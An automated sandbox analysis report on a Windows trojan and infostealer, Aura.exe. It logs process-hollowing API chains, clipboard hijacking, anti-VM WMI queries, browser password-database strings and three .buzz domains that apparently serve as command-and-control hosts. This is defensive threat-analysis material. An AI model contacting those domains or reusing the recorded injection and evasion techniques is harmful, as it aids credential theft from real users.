                Source: Aura.exe, 00000002.00000003.1816181771.0000000005C4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Aura.exe, 00000002.00000003.1816181771.0000000005C4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Aura.exe, 00000002.00000003.1816181771.0000000005C4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Aura.exe, 00000002.00000003.1816181771.0000000005C4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: Aura.exe, 00000002.00000003.1739457082.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739487855.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49747 version: TLS 1.2
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00432C00 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00432C00
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_05941000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,2_2_05941000
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00432C00 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00432C00
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000A10000_2_000A1000
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000AF5550_2_000AF555
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000C77920_2_000C7792
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000C5C5E0_2_000C5C5E
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000B9CC00_2_000B9CC0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000B3FB20_2_000B3FB2
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_000A10002_2_000A1000
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_000AF5552_2_000AF555
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_000C77922_2_000C7792
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_000C5C5E2_2_000C5C5E
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_000B9CC02_2_000B9CC0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_000B3FB22_2_000B3FB2
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004380002_2_00438000
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004120A02_2_004120A0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0040B11D2_2_0040B11D
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004269E02_2_004269E0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0040E1FA2_2_0040E1FA
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043F1A02_2_0043F1A0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004219B02_2_004219B0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004232572_2_00423257
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004382F02_2_004382F0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043FB302_2_0043FB30
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00422C3F2_2_00422C3F
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043B4D02_2_0043B4D0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004086802_2_00408680
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0042BF5D2_2_0042BF5D
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004157292_2_00415729
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0041C0512_2_0041C051
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0042F8562_2_0042F856
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004038C02_2_004038C0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004058D02_2_004058D0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004260E02_2_004260E0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004288822_2_00428882
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0041E0802_2_0041E080
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004210B02_2_004210B0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0042C8BC2_2_0042C8BC
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0042BF5D2_2_0042BF5D
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004086802_2_00408680
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004189682_2_00418968
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043E9702_2_0043E970
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043B9102_2_0043B910
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004471CB2_2_004471CB
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0041C9802_2_0041C980
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0041499B2_2_0041499B
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0041D9A02_2_0041D9A0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004292412_2_00429241
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00432A402_2_00432A40
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0040AA502_2_0040AA50
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004042702_2_00404270
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004242002_2_00424200
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043EA202_2_0043EA20
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004152302_2_00415230
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004062902_2_00406290
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004092A02_2_004092A0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0042D2B32_2_0042D2B3
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043EAB02_2_0043EAB0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0042DB4C2_2_0042DB4C
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00402B202_2_00402B20
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00419BE02_2_00419BE0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00429BE12_2_00429BE1
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0040FB822_2_0040FB82
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00404BA02_2_00404BA0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0041E3A02_2_0041E3A0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004394592_2_00439459
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004244602_2_00424460
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0042846C2_2_0042846C
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043BC302_2_0043BC30
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00415C3B2_2_00415C3B
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043F4C02_2_0043F4C0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004292412_2_00429241
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00427CD52_2_00427CD5
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043DCE72_2_0043DCE7
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004114802_2_00411480
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0041DC802_2_0041DC80
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00427C8F2_2_00427C8F
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004225402_2_00422540
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0042A5502_2_0042A550
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00411D742_2_00411D74
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00423D782_2_00423D78
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004075002_2_00407500
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00438D102_2_00438D10
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0041ADD02_2_0041ADD0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0041E5E02_2_0041E5E0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00418D9F2_2_00418D9F
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00436DBA2_2_00436DBA
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0042EE4B2_2_0042EE4B
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00426E502_2_00426E50
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0040EE602_2_0040EE60
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043EE602_2_0043EE60
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004246002_2_00424600
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00428E342_2_00428E34
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00402EC02_2_00402EC0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004376E02_2_004376E0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004096A02_2_004096A0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004167452_2_00416745
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0042CF462_2_0042CF46
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043E7002_2_0043E700
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004067202_2_00406720
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00408F202_2_00408F20
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043F7C02_2_0043F7C0
                Source: C:\Users\user\Desktop\Aura.exeCode function: String function: 000AFAE4 appears 34 times
                Source: C:\Users\user\Desktop\Aura.exeCode function: String function: 000BCFD6 appears 40 times
                Source: C:\Users\user\Desktop\Aura.exeCode function: String function: 000AFA60 appears 100 times
                Source: C:\Users\user\Desktop\Aura.exeCode function: String function: 000B0730 appears 38 times
                Source: C:\Users\user\Desktop\Aura.exeCode function: String function: 000B80F8 appears 42 times
                Source: C:\Users\user\Desktop\Aura.exeCode function: String function: 00414510 appears 76 times
                Source: C:\Users\user\Desktop\Aura.exeCode function: String function: 00408060 appears 46 times
                Source: Aura.exeStatic PE information: invalid certificate
                Source: Aura.exe, 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Aura.exe
                Source: Aura.exe, 00000000.00000002.1675524552.000000000456B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Aura.exe
                Source: Aura.exe, 00000002.00000000.1674920492.000000000012E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Aura.exe
                Source: Aura.exe, 00000002.00000003.1675293152.0000000004D30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Aura.exe
                Source: Aura.exeBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Aura.exe
                Source: Aura.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Aura.exeStatic PE information: Section: .bss ZLIB complexity 1.0003282289933444
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@11/2
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004382F0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_004382F0
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
                Source: Aura.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Aura.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Aura.exe, 00000002.00000003.1792851180.0000000005B38000.00000004.00000800.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1768139082.0000000005B56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Aura.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\Desktop\Aura.exeFile read: C:\Users\user\Desktop\Aura.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"
                Source: C:\Users\user\Desktop\Aura.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Aura.exeProcess created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"
                Source: C:\Users\user\Desktop\Aura.exeProcess created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Aura.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Aura.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Aura.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Aura.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Aura.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: Aura.exeStatic PE information: real checksum: 0x899e8 should be: 0x932d7
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000AFB83 push ecx; ret 0_2_000AFB96
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_3_033AF6D8 pushad ; retf 2_3_033AF6D9
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_3_033AF6D8 pushad ; retf 2_3_033AF6D9
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_3_033AFF41 push ebp; iretd 2_3_033AFF7E
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_3_033AFF41 push ebp; iretd 2_3_033AFF7E
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_3_033AF6D8 pushad ; retf 2_3_033AF6D9
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_3_033AF6D8 pushad ; retf 2_3_033AF6D9
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_3_033B16D8 push esi; retf 2_3_033B16D9
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_3_033AFF41 push ebp; iretd 2_3_033AFF7E
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_3_033AFF41 push ebp; iretd 2_3_033AFF7E
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_000AFB83 push ecx; ret 2_2_000AFB96
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043B870 push eax; mov dword ptr [esp], 68696A6Bh2_2_0043B87E
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0044289D pushfd ; ret 2_2_0044289E
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00444918 push cs; iretd 2_2_0044491F
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_004471CB push ds; retf 2_2_004476AE
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00447AB0 push E0669587h; iretd 2_2_00447AB5
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00444CF4 push esp; ret 2_2_00444CF9
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00444ED1 push edi; ret 2_2_00444ED3
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043E6B0 push eax; mov dword ptr [esp], AFAEAD9Ch2_2_0043E6B1
                Source: C:\Users\user\Desktop\Aura.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Aura.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Aura.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeWindow / User API: threadDelayed 9913Jump to behavior
                Source: C:\Users\user\Desktop\Aura.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-21412
                Source: C:\Users\user\Desktop\Aura.exeAPI coverage: 9.2 %
                Source: C:\Users\user\Desktop\Aura.exe TID: 7432Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Aura.exe TID: 7796Thread sleep count: 9913 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Aura.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Aura.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Aura.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000C1FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_000C1FE9
                Source: Aura.exe, 00000002.00000003.2531148527.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739584373.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000002.3511215128.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531674049.00000000033B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw5
                Source: Aura.exe, 00000002.00000003.2531148527.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.1739584373.00000000033B8000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000002.3511215128.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000002.00000003.2531674049.00000000033B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Aura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: C:\Users\user\Desktop\Aura.exeAPI call chain: ExitProcess graph end nodegraph_2-33886
                Source: C:\Users\user\Desktop\Aura.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_0043CFA0 LdrInitializeThunk,2_2_0043CFA0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000AF8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000AF8E9
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000DA19E mov edi, dword ptr fs:[00000030h]0_2_000DA19E
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000A1FB0 mov edi, dword ptr fs:[00000030h]0_2_000A1FB0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_000A1FB0 mov edi, dword ptr fs:[00000030h]2_2_000A1FB0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000BD8E0 GetProcessHeap,0_2_000BD8E0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000AF52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_000AF52D
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000AF8DD SetUnhandledExceptionFilter,0_2_000AF8DD
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000AF8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000AF8E9
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000B7E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000B7E30
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_000AF52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000AF52D
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_000AF8DD SetUnhandledExceptionFilter,2_2_000AF8DD
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_000AF8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000AF8E9
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_000B7E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000B7E30

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000DA19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_000DA19E
                Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Users\user\Desktop\Aura.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Aura.exe, 00000000.00000002.1675524552.000000000456B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                Source: Aura.exe, 00000000.00000002.1675524552.000000000456B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: Aura.exe, 00000000.00000002.1675524552.000000000456B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
